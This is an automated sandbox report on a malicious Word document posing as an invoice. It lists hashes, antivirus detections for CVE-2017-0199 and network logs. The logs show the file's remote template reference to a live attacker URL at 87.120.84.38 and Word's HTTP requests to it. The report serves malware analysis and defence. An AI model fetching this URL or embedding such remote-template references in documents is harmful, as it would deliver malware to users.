Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INVOICEX-XCopy.docx.doc

Overview

General Information

Sample name:INVOICEX-XCopy.docx.doc
Analysis ID:1538505
MD5:ec621a479efeb5576dbe1ede8245894b
SHA1:9a3c1d701f29f7f65c9d1fab217cd55a1cc3609e
SHA256:06894236b22810452dd0bfaf02c3a0cde3428fe19eb9e789b344de6ba4079083
Tags:docuser-lowmal3
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Contains an external reference to another file
Office viewer loads remote template
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3312 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup
No configs have been found
No yara matches
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 3312, Protocol: tcp, SourceIp: 87.120.84.38, SourceIsIpv6: false, SourcePort: 80
Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3312, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3312, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: INVOICEX-XCopy.docx.docAvira: detected
Source: INVOICEX-XCopy.docx.docReversingLabs: Detection: 54%
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: Joe Sandbox ViewIP Address: 87.120.84.38 87.120.84.38
Source: Joe Sandbox ViewASN Name: SHARCOM-ASBG SHARCOM-ASBG
Source: global trafficHTTP traffic detected: GET /txt/mncharliezx.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 87.120.84.38Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A57117A8-FF75-46DD-B526-20AA3941D964}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /txt/mncharliezx.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 87.120.84.38Connection: Keep-Alive
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Mon, 21 Oct 2024 11:27:33 GMTContent-Type: text/html; charset=iso-8859-1Connection: keep-alive
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Mon, 21 Oct 2024 11:27:33 GMTContent-Type: text/html; charset=iso-8859-1Connection: keep-alive
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Mon, 21 Oct 2024 11:27:40 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 65 36 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 4f c1 4a c4 30 14 bc f7 2b 9e 7b d2 83 79 6d 0d d8 43 08 ac db 2e 2e d4 b5 68 7a f0 98 dd 3c c9 c2 da d4 24 55 fc 7b d3 2e 82 97 07 33 6f 66 98 11 57 f5 f3 46 bd 75 0d 3c aa a7 16 ba fe a1 dd 6d 60 75 8b b8 6b d4 16 b1 56 f5 e5 53 b2 1c b1 d9 af 64 26 6c fc 38 4b 61 49 9b 04 e2 29 9e 49 f2 9c c3 de 45 d8 ba 69 30 02 2f 64 26 70 11 89 83 33 3f b3 af 90 ff 34 09 65 62 94 ca 12 78 fa 9c 28 44 32 d0 bf b4 f0 ad 03 0c 29 eb 7d ce 02 37 40 b4 a7 00 81 fc 17 79 26 70 9c 93 7c 3a da 18 4f 21 c8 f5 a8 8f 96 b0 64 9c f1 02 ae fb c3 34 c4 e9 06 5e 17 03 e8 08 d5 3d 2b ca 9c 55 9c dd 55 d0 39 9f 98 5c e0 9f 3d b5 5c fa a5 b2 f3 ae ec 17 81 af 29 7c 12 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e6MOJ0+{ymC..hz<$U{.3ofWFu<m`ukVSd&l8KaI)IEi0/d&p3?4ebx(D2)}7@y&p|:O!d4^=+UU9\=\)|0
Source: classification engineClassification label: mal72.evad.winDOC@1/12@0/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$VOICEX-XCopy.docx.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRADCB.tmpJump to behavior
Source: INVOICEX-XCopy.docx.docOLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: INVOICEX-XCopy.docx.docReversingLabs: Detection: 54%
Source: INVOICEX-XCopy.docx.LNK.0.drLNK file: ..\..\..\..\..\Desktop\INVOICEX-XCopy.docx.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEAutomated click: OK
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEAutomated click: OK
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: INVOICEX-XCopy.docx.docInitial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: INVOICEX-XCopy.docx.docInitial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

barindex
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\87.120.84.38\DavWWWRootJump to behavior
Source: settings.xml.relsExtracted files from sample: http://87.120.84.38/txt/mncharliezx.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Exploitation for Client Execution
Path InterceptionPath Interception1
Masquerading
OS Credential Dumping1
File and Directory Discovery
Remote ServicesData from Local System2
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable Media12
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
INVOICEX-XCopy.docx.doc54%ReversingLabsDocument-Word.Exploit.CVE-2017-0199
INVOICEX-XCopy.docx.doc100%AviraW2000/AVI.Agent.shcsn
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://87.120.84.38/txt/mncharliezx.doctrue
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    87.120.84.38
    unknownBulgaria
    51189SHARCOM-ASBGtrue
    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1538505
    Start date and time:2024-10-21 13:26:26 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 4m 35s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:9
    Number of new started drivers analysed:1
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:INVOICEX-XCopy.docx.doc
    Detection:MAL
    Classification:mal72.evad.winDOC@1/12@0/1
    EGA Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Found application associated with file extension: .doc
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe
    • Report size getting too big, too many NtQueryValueKey calls found.
    • Report size getting too big, too many NtSetInformationFile calls found.
    • VT rate limit hit for: INVOICEX-XCopy.docx.doc
    No simulations
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
